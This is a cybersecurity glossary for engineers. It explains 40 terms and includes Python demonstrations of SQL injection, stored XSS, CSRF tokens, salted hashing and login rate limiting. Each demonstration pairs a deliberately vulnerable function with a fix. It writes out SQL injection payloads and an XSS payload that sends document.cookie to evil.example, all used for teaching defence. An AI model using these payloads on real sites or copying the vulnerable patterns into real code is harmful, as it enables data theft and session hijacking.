Security Vocabulary: 40 Cybersecurity Terms in Plain English
Plain-English explanations of 40 essential cybersecurity terms: vulnerability, exploit, CVE, OWASP, zero-day, SQL injection, phishing, MFA, and more.
Security vocabulary crops up in every engineering role — not just in dedicated security teams. Developers review OWASP checklists, DevOps engineers harden infrastructure, and QA engineers write security test cases. This guide covers 40 cybersecurity terms you need to understand and use correctly in tech conversations.
Threat & Attack Concepts
Vulnerability
A vulnerability is a weakness in software, hardware, configuration, or a process that could be exploited by an attacker.
“The authentication module has a vulnerability — it allows brute-force attacks.”
Exploit
An exploit is a piece of code, a technique, or a sequence of steps that takes advantage of a vulnerability to cause unintended or unauthorised behaviour.
“A proof-of-concept exploit for this CVE was published on GitHub.”
CVE (Common Vulnerabilities and Exposures)
A CVE is a standardised identifier for a publicly disclosed security vulnerability. Format: CVE-YEAR-NUMBER. Example: CVE-2021-44228 (Log4Shell).
“We need to patch the library — it has a critical CVE.”
Zero-Day (0-Day)
A zero-day is a vulnerability that is unknown to the software vendor, or known but not yet patched, at the moment attackers start exploiting it. The name comes from the vendor having had "zero days" to prepare a fix. Until a patch ships, the only defences are workarounds, detection, and limiting exposure of the affected component.
“The attack used a zero-day in the browser’s PDF renderer.”
Attack Vector
An attack vector is the path or method an attacker uses to access a system. Common attack vectors: web application, email phishing, unpatched software, insider threat.
Attack Surface
The attack surface is the sum of all possible entry points where an attacker could try to enter a system. Reducing the attack surface is a core security principle.
“By removing unused services, we significantly reduced the attack surface.”
Threat Model
A threat model is the output of threat modelling: a structured description of what you are protecting, who might attack it, how they could do so, and which defences address each threat. It answers four questions: what are we building? Who are the attackers and what do they want? What can go wrong? What are we going to do about it?
Common Attack Types
SQL Injection (SQLi)
SQL injection is an attack where user-controlled input is concatenated into a SQL query, so that characters such as quotes and comment markers change the structure of the statement and the database executes commands the developer never intended. It can expose, modify, or delete data, or bypass authentication entirely.
“The search field was vulnerable to SQL injection — the attacker dumped the entire users table.”
Prevention: use parameterised queries or prepared statements, never build SQL strings from user input. As a second layer, give the application's database account only the privileges it needs, so a successful injection cannot drop tables or read unrelated data.
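As an added illustration (this is example code, not code from the original article), here is the search-field scenario reproduced in Python against an in-memory SQLite database. The table contents, the two attacker payloads, and the function names are constructed for the example; the vulnerable and safe versions differ only in how the search term reaches the query.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def search_vulnerable(conn, term):
    """The bug: the search term is spliced into the SQL text, so a quote in the
    input ends the string literal and the rest of the input is parsed as SQL."""
    query = f"SELECT username FROM users WHERE username = '{term}'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, term):
    """The fix: a parameterised query. The statement structure is fixed and the
    driver supplies the value separately, so the input can only ever be data."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (term,))]


# Constructed attacker inputs.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"                                      # matches every row
DUMP_PAYLOAD = "' UNION SELECT username || ':' || role FROM users --"  # reads other columns

if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, "alice"))            # ['alice']
    print(search_vulnerable(conn, TAUTOLOGY_PAYLOAD))  # every username
    print(search_vulnerable(conn, DUMP_PAYLOAD))       # username:role for every user
    print(search_safe(conn, TAUTOLOGY_PAYLOAD))        # [] : the payload is just a string
```

The `--` at the end of the dump payload comments out the trailing quote the original query appends, which is why the injected `UNION` parses cleanly. The safe version returns nothing for the same input because SQLite compares the literal string `' OR '1'='1` against the username column.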
Cross-Site Scripting (XSS)
XSS is an attack where attacker-supplied script ends up in a web page viewed by other users because the application writes untrusted input into HTML without encoding it. The script runs in the victim's browser with the page's origin, so it can steal session tokens, perform actions as the user, redirect them, or manipulate the DOM. Stored XSS persists in the database, reflected XSS arrives in a crafted link, and DOM-based XSS is introduced by client-side JavaScript.
"The comment section had a stored XSS vulnerability: any script a user posted would execute for everyone who viewed it."
Prevention: encode output for the context it lands in (HTML body, attribute, JavaScript, URL), use a templating engine that escapes by default, and deploy a Content Security Policy as a backstop.
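The stored-XSS comment section described above, as an added Python example (not code from the original article). The three sample comments are constructed; two are attacker payloads aimed at different HTML contexts. Rather than eyeballing the output, the example parses each rendered fragment with the standard library's HTML parser and reports any tag or event-handler attribute that the comment markup should never contain.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample comments: one benign, one script injection for the HTML
# body, one break-out for the quoted title="" attribute.
COMMENTS = [
    "Great post!",
    "<script>fetch('https://evil.example/?c=' + document.cookie)</script>",
    '" onmouseover="alert(document.cookie)',
]


def render_comment_vulnerable(text):
    """Stored XSS bug: the saved comment is interpolated into the page as-is."""
    return f'<div class="comment" title="{text}">{text}</div>'


def render_comment_safe(text):
    """Encode for the HTML body and for the quoted attribute. quote=True turns
    double and single quotes into entities, so the attribute cannot be closed early."""
    safe = escape(text, quote=True)
    return f'<div class="comment" title="{safe}">{safe}</div>'


class ActiveContentScanner(HTMLParser):
    """Parses the rendered fragment the way a browser would and records any tag
    other than the expected <div> and any on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.unexpected_tags = set()
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag != "div":
            self.unexpected_tags.add(tag)
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def active_content(html):
    """Return (sorted unexpected tags, event-handler attribute names) for a fragment."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(scanner.unexpected_tags), scanner.event_handlers


if __name__ == "__main__":
    for comment in COMMENTS:
        print("vulnerable:", active_content(render_comment_vulnerable(comment)))
        print("safe:      ", active_content(render_comment_safe(comment)))
```

The second payload never uses `<` at all: it closes the `title` attribute and adds an `onmouseover` handler, which is why escaping only angle brackets is not enough and the attribute context needs quotes encoded too.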
Cross-Site Request Forgery (CSRF)
CSRF tricks an authenticated user's browser into sending a request the user never intended to a web application. It works because the browser attaches cookies to requests automatically, so a form auto-submitted from a malicious site arrives carrying the victim's session. Prevention: anti-CSRF tokens embedded in the application's own pages (the attacker's site cannot read them), the `SameSite` cookie attribute, and checking the `Origin` header on state-changing requests.
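The token defence described above, as an added Python example (not code from the original article). The request objects, the `/transfer` handler, the session IDs, and the server key are all constructed for the example; the token scheme is a synchroniser-style token bound to the session with HMAC, which avoids storing per-session tokens server-side.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment secret; in production load it from a secrets store.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Derive a token bound to this session: HMAC-SHA256(server_key, session_id).
    The application embeds it in its own forms as a hidden field."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, token):
    """Constant-time comparison; a missing token or one minted for another session fails."""
    if not session_id or not token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def transfer_handler(request):
    """POST /transfer. `request` is a constructed dict, not a real framework object."""
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return 401, "not logged in"
    # The browser sends the session cookie with any request to this site, so the
    # cookie alone does not prove the user intended this action. Require the
    # token that only the application's own page could have put in the form.
    form = request.get("form", {})
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "csrf check failed"
    return 200, f"transferred {form['amount']} to {form['to']}"


def legitimate_request(session_id):
    """Form rendered by the bank's own page, which embedded the token."""
    return {
        "cookies": {"session": session_id},
        "form": {"to": "bob", "amount": "10", "csrf_token": issue_csrf_token(session_id)},
    }


def forged_request(session_id):
    """Auto-submitted form from evil.example. The victim's browser still attaches
    the cookie, but the attacker cannot read the token from the bank's page."""
    return {
        "cookies": {"session": session_id},
        "form": {"to": "attacker", "amount": "5000"},
    }


if __name__ == "__main__":
    print(transfer_handler(legitimate_request("sess-abc")))  # (200, ...)
    print(transfer_handler(forged_request("sess-abc")))      # (403, ...)
```

Binding the token to the session ID is what stops an attacker from obtaining a token in their own session and replaying it against the victim's.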
Phishing
Phishing is a social engineering attack where an attacker poses as a trusted entity (bank, colleague, internal IT) to trick users into revealing credentials or clicking malicious links.
“Several employees received a phishing email impersonating our IT helpdesk.”
Variants: spear phishing (targeted at a specific person), whaling (targeting executives).
Man-in-the-Middle (MitM) Attack
A man-in-the-middle attack occurs when an attacker secretly relays, and possibly alters, the communication between two parties who believe they are talking directly to each other. Typical positions include a rogue Wi-Fi access point or ARP/DNS spoofing on a local network. TLS with proper certificate validation is the standard defence, which is why applications that disable certificate checks are exposed.
Brute Force Attack
A brute force attack tries candidate credentials (passwords, PINs, keys) one after another until one works. In practice attackers start with dictionaries of common passwords and credentials leaked from other breaches rather than every possible combination, so the effective defences are rate limiting, MFA, and rejecting passwords known to be compromised.
Denial of Service (DoS) / DDoS
A DoS attack overwhelms a system with traffic or requests, making it unavailable to legitimate users. DDoS (Distributed Denial of Service) uses many machines simultaneously — typically a botnet.
Buffer Overflow
A buffer overflow occurs when more data is written to a memory buffer than it can hold, overwriting adjacent memory such as other variables or a function's return address. Historically a major source of exploits, especially in C/C++ applications. Memory-safe languages and mitigations such as stack canaries, ASLR, and non-executable memory make these much harder to exploit, but they still appear in native code.
Defence & Mitigation
Authentication (AuthN)
Authentication verifies who you are. Examples: password login, biometrics, SSH key. AuthN and AuthZ are shorthand taken from the spelling of each word (authe-N-tication, authori-Z-ation) so the two are not confused when abbreviated.
Authorisation (AuthZ)
Authorisation determines what an authenticated identity is allowed to do. Examples: role-based access control (RBAC), reading vs. writing a resource. Broken authorisation (users reaching other users' data) is consistently the most common web application flaw, so every request must check permissions server-side.
Multi-Factor Authentication (MFA / 2FA)
MFA requires two or more verification factors from different categories: something you know (password), something you have (phone or hardware token), something you are (biometrics). 2FA is the special case of exactly two. Two factors from the same category, such as a password plus a security question, do not count. Phishing-resistant methods (FIDO2/WebAuthn hardware keys, passkeys) are preferred over SMS codes, which can be intercepted or SIM-swapped.
Principle of Least Privilege
The principle of least privilege means giving each user, process, or system only the minimum permissions needed to do their job — nothing more.
“Following least privilege, the API service account should only have read access to the config bucket.”
Defence in Depth
Defence in depth is a security strategy that uses multiple layers of controls. If one layer fails, others still protect the system.
Encryption
Encryption transforms data into an unreadable form (ciphertext) using a key. Only someone with the correct key can decrypt it.
- At rest — encrypted data stored on disk
- In transit — encrypted data moving over a network (HTTPS, TLS)
TLS / SSL
TLS (Transport Layer Security) is the protocol that secures HTTPS connections, providing encryption, integrity, and server authentication via certificates. SSL is its deprecated predecessor; every SSL version and TLS 1.0/1.1 should be disabled, leaving TLS 1.2 and 1.3. When people say "SSL certificate," they mean an X.509 certificate used for TLS.
Hashing
Hashing converts data of any size into a fixed-length value (a hash or digest). Unlike encryption, it is one-way: there is no key, and you cannot reverse a hash to recover the input. Used for storing passwords: never store passwords in plain text; store a hash computed with a deliberately slow, salted password-hashing function (bcrypt, scrypt, Argon2, or PBKDF2). Fast general-purpose hashes such as MD5 or SHA-256 are the wrong tool here, because attackers can test billions of guesses per second against them.
“Passwords are stored as bcrypt hashes, not in plain text.”
Salting
Salting adds a random, per-password value to the input before hashing and stores it alongside the hash. Identical passwords then produce different hashes, which defeats precomputed rainbow tables and stops an attacker from cracking many accounts with a single computation.
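Hashing and salting together, as an added Python example (not code from the original article). The article's quote mentions bcrypt, which is not in the standard library, so this example uses PBKDF2-HMAC-SHA256 from `hashlib` instead; the storage format, iteration count, and sample passwords are constructed for the example.

```python
import hashlib
import hmac
import os

ALGORITHM = "sha256"
# Kept modest so the example runs quickly; OWASP's Password Storage Cheat Sheet
# recommends 600,000 iterations for PBKDF2-HMAC-SHA256.
ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex'.
    A fresh 16-byte random salt is generated for every password."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac(ALGORITHM, password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_{ALGORITHM}${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the salt and iteration count stored next to the hash, then
    compare in constant time. Malformed records verify as False rather than raising."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
        algo = scheme.split("_", 1)[1]
        candidate = hashlib.pbkdf2_hmac(
            algo, password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
    except (ValueError, IndexError):
        return False
    return hmac.compare_digest(candidate.hex(), digest_hex)


def unsalted_sha256(password):
    """What not to do: every user with this password gets the same digest, and a
    precomputed table of common passwords cracks all of them at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    a = hash_password("correct horse battery staple")
    b = hash_password("correct horse battery staple")
    print(a != b)                                         # True: different salts
    print(verify_password("correct horse battery staple", a))  # True
    print(verify_password("Tr0ub4dor&3", a))              # False
    print(unsalted_sha256("123456") == unsalted_sha256("123456"))  # True: the problem
```

Storing the algorithm and iteration count with each record is what lets you raise the cost factor later and re-hash users transparently at their next login.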
Rate Limiting
Rate limiting restricts how many requests a user, IP address, or API key can make in a given time period. It slows brute force attacks, credential stuffing, and abusive scraping, and is usually enforced at the gateway or load balancer as well as inside the application. The choice of key matters: limiting by username alone lets an attacker lock real users out, limiting by IP alone misses attacks spread across many addresses.
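Rate limiting applied to the brute force attack described earlier, as an added Python example (not code from the original article). The sliding-window limiter, the toy credential store, the wordlist, and the IP addresses are constructed for the example; time is passed in explicitly so the run is deterministic.

```python
import hmac
from collections import deque


class LoginRateLimiter:
    """Sliding-window limiter: at most max_attempts per key within any window seconds."""

    def __init__(self, max_attempts=5, window=300):
        self.max_attempts = max_attempts
        self.window = window
        self._attempts = {}  # key -> deque of attempt timestamps

    def allow(self, key, now):
        """Record an attempt and return True if it is within the limit."""
        q = self._attempts.setdefault(key, deque())
        while q and now - q[0] >= self.window:
            q.popleft()  # drop attempts that have aged out of the window
        if len(q) >= self.max_attempts:
            return False
        q.append(now)
        return True

    def reset(self, key):
        self._attempts.pop(key, None)


# Constructed toy credential store. A real one holds salted password hashes.
USERS = {"alice": "correct horse battery staple"}


def login(limiter, source_ip, username, password, now):
    """Return 'ok', 'denied' or 'rate_limited'. Keyed on (ip, username) so that one
    attacker cannot lock everyone out and one address cannot spray one account."""
    key = f"{source_ip}|{username}"
    if not limiter.allow(key, now):
        return "rate_limited"  # rejected before the password is even checked
    expected = USERS.get(username, "")
    if expected and hmac.compare_digest(expected.encode(), password.encode()):
        limiter.reset(key)
        return "ok"
    return "denied"


# Constructed wordlist of the kind a brute force tool would start with.
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome", "admin", "dragon", "monkey"]


def simulate_brute_force(wordlist=WORDLIST, start=0.0):
    """Attacker at 203.0.113.7 guesses against alice once per second, then alice
    logs in from her own address. Returns the outcome of every attempt in order."""
    limiter = LoginRateLimiter(max_attempts=5, window=300)
    outcomes = [
        login(limiter, "203.0.113.7", "alice", guess, start + i)
        for i, guess in enumerate(wordlist)
    ]
    outcomes.append(login(limiter, "198.51.100.4", "alice", USERS["alice"], start + len(wordlist)))
    return outcomes


if __name__ == "__main__":
    print(simulate_brute_force())
```

After five failures the attacker's remaining guesses are refused without the password being checked at all, while alice, coming from a different address, is unaffected. A real deployment would also add increasing delays and alert on the blocked attempts.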
Infrastructure & Compliance
Firewall
A firewall monitors and controls incoming and outgoing network traffic based on security rules, typically source and destination address, port, and protocol; next-generation firewalls also inspect application-layer content. Can be a hardware appliance, host software, or a cloud provider's security groups.
Intrusion Detection System (IDS) / Intrusion Prevention System (IPS)
An IDS monitors network or host activity for suspicious patterns and raises alerts; an IPS sits inline and can also block or drop the offending traffic. Both depend on signatures and tuned rules, so they need ongoing maintenance to stay useful and avoid alert fatigue.
Penetration Testing (Pen Test)
Penetration testing is an authorised, scoped simulated attack on a system to find exploitable vulnerabilities before real attackers do. Pen testers break in ethically under a written agreement that defines targets and rules of engagement, then report what they found and how to fix it.
“We run annual pen tests and address all critical findings immediately.”
OWASP Top 10
The OWASP Top 10 is a list published by OWASP (the Open Worldwide Application Security Project, formerly the Open Web Application Security Project) identifying the ten most critical web application security risk categories, such as broken access control and injection. It is an awareness document rather than a complete checklist, but it is the standard starting reference for secure coding practices.
CVE / NVD / CVSS
- CVE — the identifier (e.g., CVE-2021-44228)
- NVD (National Vulnerability Database) — the US government (NIST) catalogue that enriches CVEs with CVSS scores, affected products, and references
- CVSS (Common Vulnerability Scoring System) — a score from 0 to 10 computed from metrics such as attack vector, required privileges, and impact; in CVSS v3, 9.0 to 10.0 is rated Critical and 7.0 to 8.9 High. CVSS measures technical severity, not the likelihood of exploitation, so pair it with exploitability data when prioritising patches
Patch Management
Patch management is the process of regularly applying software updates (patches) that fix vulnerabilities. Unpatched systems are one of the most common causes of breaches.
Security Audit
A security audit is a systematic assessment of a system’s security against a standard. Can be internal or by a third party.
Hardening
Hardening means reducing the attack surface by disabling unnecessary services, closing unused ports, applying strict access controls, and tightening default configurations, usually against a published baseline such as the CIS Benchmarks.
Incident Response (IR)
Incident response is the process of detecting, containing, eradicating, and recovering from a security incident (breach, ransomware, data leak), followed by a post-incident review of what went wrong and what to change. A documented and rehearsed IR plan is essential for any serious organisation; the middle of an incident is the wrong time to work out who can take a production system offline.
Key Terms Quick Reference
| Term | One-liner |
|---|---|
| Vulnerability | A weakness that can be exploited |
| Exploit | Code/technique that uses a vulnerability |
| CVE | Standardised ID for a known vulnerability |
| Zero-day | Vulnerability exploited before the vendor has a patch |
| SQL injection | Malicious SQL inserted via user input |
| XSS | Malicious scripts injected into web pages |
| CSRF | Forged requests using a logged-in user’s session |
| Phishing | Social engineering via fake trusted messages |
| MFA | Multiple factors required to authenticate |
| Least privilege | Grant only the minimum access needed |
| TLS | Protocol securing HTTPS connections |
| Pen test | Authorised simulated attack to find vulnerabilities |
| OWASP Top 10 | List of 10 most critical web application risks |
| Hardening | Reducing attack surface through configuration |